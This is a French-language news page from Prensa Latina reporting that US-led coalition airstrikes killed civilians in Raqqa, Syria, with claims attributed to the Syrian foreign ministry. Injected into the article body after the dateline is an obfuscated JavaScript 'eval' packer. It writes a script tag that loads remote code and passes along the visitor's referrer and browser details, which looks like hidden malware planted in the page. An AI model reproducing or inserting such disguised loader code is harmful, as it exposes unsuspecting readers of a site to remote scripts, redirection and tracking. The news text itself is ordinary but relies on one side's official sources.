mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les attaques de la coalition menée par les États-Unis tuent 27 civils en Syrie

Damas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hbrdt|var|u0026u|referrer|hntan||js|php'.split('|'),0,{})) 21 août (PL) Au moins 27 civils sont décédés dans le nord de la Syrie, suite à des attaques aériennes sans discernements, à l'aveugle, de la part de la coalition international dirigée par les États-Unis.

Damas, 21 août (PL) Au moins 27 civils sont décédés dans le nord de la Syrie, suite à des attaques aériennes sans discernements, à l’aveugle, de la part de la coalition international dirigée par les États-Unis.

Comme conséquences de ces bombardements sur la circonscription centrale de la province de Raqqa, supposément destinés à exterminer les groupes terroristes de l’État Islamique, des dizaines de personnes ont été blessées et des infrastructures importantes détruites.

Des organismes humanitaires ont révélé que lors des derniers jours,dans l’enclave de Raqqa, considérée comme l’un des bastion de Daesh. 120 civils ont péri sous les bombes des États-Unis et de leurs alliés occidentaux.

Le Ministère des Relations Extérieures syrien a dénoncé le fait que le 17 août dernier, cette alliance a réalisé trois attaques consécutives contre une église de Raqqa, sans qu’aucun terroriste ne soit à l’intérieur.

Il a également précisé que, dans des zones résidentielles syriennes,  les avions de chasse des puissances occidentales utilisent des missiles intelligents et des bombes de phosphore blanc, ce qui est interdit par les conventions internationales.

peo/mem/obf 

EN CONTINU
notes connexes